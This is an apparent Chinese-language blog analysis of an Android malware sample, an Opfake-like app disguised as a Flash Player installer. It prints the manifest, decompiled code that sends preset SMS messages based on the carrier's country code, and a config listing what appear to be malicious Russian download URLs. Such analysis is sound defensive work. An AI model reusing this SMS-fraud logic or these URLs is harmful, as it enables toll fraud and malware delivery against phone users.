android恶意程序分析 （四）

这次分析的依然是opfake的一个变种，但实际分析下来，感觉这个不太像，内容也是比较怪异的。

亮点不多

 

写道

Opfake 另一个变种？
1． AndroidManifest.xml
<?xml version="1.0" encoding="utf-8"?>
<manifest android:versionCode="1" android:versionName="1.0" package="com.software.installer"
xmlns:android="http://schemas.android.com/apk/res/android">
<uses-sdk android:minSdkVersion="5" android:targetSdkVersion="5" />
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
<uses-permission android:name="android.permission.INTERNET" />
<uses-permission android:name="android.permission.READ_PHONE_STATE" />
<uses-permission android:name="android.permission.SEND_SMS" />
<application android:label="@string/app_name" android:icon="@drawable/icon" android:debuggable="true">
<receiver android:name=".Notifier">
<intent-filter>
<action android:name="android.intent.action.BOOT_COMPLETED" />
<category android:name="android.intent.category.HOME" />
</intent-filter>
</receiver>
<activity android:label="@string/app_name" android:name=".Main" android:configChanges="keyboardHidden|orientation">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
<activity android:name=".Offert" />
<activity android:name=".GrantAccess" />
</application>
</manifest>

权限上可疑的地方不多，大致有访问互联网，发短信，外部存储，读取device id，虽然请求少，但是都是比较关键的权限，估计这个有下载器的感觉。


2 。类分析
从Main开始
public void onCreate(Bundle paramBundle)
{
super.onCreate(paramBundle);
setContentView(2130903041);
Notifier localNotifier = new Notifier();
//设置preference的文件
localNotifier.setPrefs(getSharedPreferences("PREFERENCES", 0));
//下面这个function就是比较重要的了 ，他从raw资源中读取了一些东西，我们也从中发现了可疑的raw配置文件act_schemes.cfg（最后有），他从中读取了第9行的一个3，并保存到了PREFERENCES.xml中NOTIFICATION_NUMBER localNotifier.initNotificationsNumberSettings(getApplicationContext());
this.progressBar = ((ProgressBar)findViewById(2131296259));
this.pleaseWaitString = getResources().getString(2131165191);
//actor类，
this.actor = new Actor(this);
//实质是国家是否匹配上
if (!this.actor.wasInitError())
{//中间会调用init()方法，方法中大量的混杂初始一些hashmap以及数字字符串。
initSettings();
//这个会true，因为前面代码中会设置
if (this.actor.sendImmediately())
{
initGUI();
if (!this.actor.isActed())
//核心的一个方法
startAct();
}
}
while (true)
{
return;
startLoading();
continue;
if (this.actor.isActed())
{
showLink();
continue;
}
initGUI();
startLoading();
continue;
finish();
}
}


Actor类构造方法

public Actor(Context paramContext)
{
this.mContext = paramContext;
this.mgr = ((TelephonyManager)this.mContext.getSystemService("phone"));
this.currentOp = this.mgr.getNetworkOperator();
this.settings = this.mContext.getSharedPreferences("PREFERENCES", 0);
// initInformation的实质是对currentOp字符串分割
// this.countryCode = this.currentOp.substring(0, 3);
// this.operatorCode = this.currentOp.substring(3, 5);
initInformation();
//实现在后面
initDataFromConfigs();
//又是国家判断，后面有分析
if (isMGF())
{// this.texts在initDataFromConfigs已经初始化了，这句也比较好理解，应该是对应的这段xml的赋值
<countryTag>
<mcc value="02" />
<firstString value="Производится установка *APP_NAME*" />
<installedText value="Установка завершена, для запуска нажмите кнопку Открыть" />
</countryTag>

this.firstText = ((String)((HashMap)this.texts.get("02")).get("firstString"));
this.installedText = ((String)((HashMap)this.texts.get("02")).get("installedText"));
}
while (true)
{//利用stringBuilder构造了好些字符串并放到了一个hash中，
init();
return;
//这句应该是判断国家的，通过countryCode来得到对应的国家，再去countries.xml中找对应的内容
if ((isRFID()) || (isUkraineID()) || (isKZID()))
{
this.firstText = ((String)((HashMap)this.texts.get(this.countryCode)).get("firstString"));
this.installedText = ((String)((HashMap)this.texts.get(this.countryCode)).get("installedText"));
continue;
}
//这应该是默认的填上这些，如果前面的没匹配到。
this.firstText = ((String)((HashMap)this.texts.get("100000")).get("firstString"));
this.installedText = ((String)((HashMap)this.texts.get("100000")).get("installedText"));
if (this.firstText != null)
continue;
this.firstText = ((String)((HashMap)this.texts.get("250")).get("firstString"));
this.installedText = ((String)((HashMap)this.texts.get("250")).get("installedText"));
}
}

private void initDataFromConfigs()
{
try
{//这句代码实质是去可疑raw文件act_schemes.cfg,的第四第五行读取，并做成了一个Pair<String, String>返回实质就是<” 29”,” 4205+29536+d+a”>
this.schemes = TextUtils.getCodeAndPrefix(this.mContext);
CURRENT_SCHEME = (String)this.schemes.first;
try
{
//这句中又发现了一个可疑的xml文件countries.xml,它具体内容在后面，干嘛用的还不清楚，(应该是不同国家的一些区别吧，)
label24: this.texts = TextUtils.getStringsForCountries(this.mContext);
label35: this.app_name = new String();
try
{
//读取了文件act_schemes.cfg的第一行：adobe-flash-player-android
this.app_name = TextUtils.getContentName(this.mContext);
label57: this.content = new String();
try
{
//读取了文件act_schemes.cfg的第二行：http://androidosoft.ru/engine/download.php?id=38
this.content = TextUtils.getURL(this.mContext);
try
{
//这里应该是判断国家的地方通过前面得到的 this.countryCode==250 this.operatorCode=02来判断的，明显我的模拟器这里会失败，估计是只有俄罗斯境内这个才能支持吧
label79: if (isMGF())
this.sendImmediately = false;
else
//这里又读取了另一个字符串还是那个raw文件中的第三行999 ，所以这里判断就是sendImmediately=true
this.sendImmediately =
TextUtils.privateMark(this.mContext).equals("999");

}

private void startAct()
{
this.dialog = new ProgressDialog(this);
this.dialog.setMessage(this.pleaseWaitString);
this.dialog.setCancelable(false);
this.dialog.show();
registerReceiver();
//核心
this.actor.activate();
}

public void activate()
{
initReceiver();
new Sender(this.mContext, (Scheme)this.actSchemes.get(CURRENT_SCHEME), (String)this.schemes.second, this.countryCode, this.operatorCode).send();
}

public Sender(Context paramContext, Scheme paramScheme, String paramString1, String paramString2, String paramString3)
{
this.mContext = paramContext;
this.actScheme = paramScheme;
this.smsData = paramString1;
}

public void send()
{
PendingIntent localPendingIntent = PendingIntent.getBroadcast(this.mContext, 0, new Intent("SENT"), 0);
SmsManager localSmsManager = SmsManager.getDefault();
int i = this.actScheme.list.size();
if (i > 0);
for (int j = 0; ; j++)
{
if (j >= i)
return;
String str = (String)((Pair)this.actScheme.list.get(j)).second + "+" + this.smsData;
//发送短信指定内容，到指定内容this.smsData是4205+29536+d+a，这个是前面的initDataFromConfigs中从raw文件中读取的, actScheme这个则是init那个方法处理的一些数字字符串，功能不详，估计是要发送的号码之类的，比较难懂
localSmsManager.sendTextMessage((String)((Pair)this.actScheme.list.get(j)).first, null, str, localPendingIntent, null);
}
}
}




3.亮点
A．raw资源还是比较关键的部分，很多恶意软件都在raw资源中留下了线索，像这个就是raw中有act_schemes.cfg内容一看就不太对头
adobe-flash-player-android
http://androidosoft.ru/engine/download.php?id=38
999
29
4205+29536+d+a
Критичное обновление
Доступно срочное обновление браузера
http://nashimarket.ru/update/b/?s=4205&a=29
此外还有个可疑的xml文件：countries.xml
<?xml version="1.0" encoding="utf-8"?>
<countriesTag>
<countryTag>
<mcc value="250" />
<firstString value="Производится установка *APP_NAME*" />
<installedText value="Установка завершена, для запуска нажмите кнопку Открыть" />
</countryTag>
<countryTag>
<mcc value="401" />
<firstString value="Производится установка *APP_NAME*" />
<installedText value="Установка завершена, для запуска нажмите кнопку Открыть" />
</countryTag>
<countryTag>
<mcc value="255" />
<firstString value="Производится установка *APP_NAME*" />
<installedText value="Установка завершена, для запуска нажмите кнопку Открыть" />
</countryTag>
<countryTag>
<mcc value="02" />
<firstString value="Производится установка *APP_NAME*" />
<installedText value="Установка завершена, для запуска нажмите кнопку Открыть" />
</countryTag>
<countryTag>
<mcc value="100000" />
<firstString value="Производится установка *APP_NAME*" />
<installedText value="Установка завершена, для запуска нажмите кнопку Открыть" />
</countryTag>
</countriesTag>

B.这个恶意软件对不同的国家进行了不同的处理，通过
mgr =((TelephonyManager)this.mContext.getSystemService("phone"));
this.currentOp = this.mgr.getNetworkOperator();
this.settings = this.mContext.getSharedPreferences("PREFERENCES", 0);
// initInformation的实质是对currentOp字符串分割
// this.countryCode = this.currentOp.substring(0, 3);
// this.operatorCode = this.currentOp.substring(3, 5);
获得本机的国家编码，在对应的配置文件xml中来做相应的处理。

C，init()采用了StringBuilder来动态的生成string，有可能是以后对抗恶意代码检测的一个手段吧。

D 感觉像是一个未完成的东西，实质上的危害只有发送短信一个功能，而且内容都是实现指定好的，感觉上比较凌乱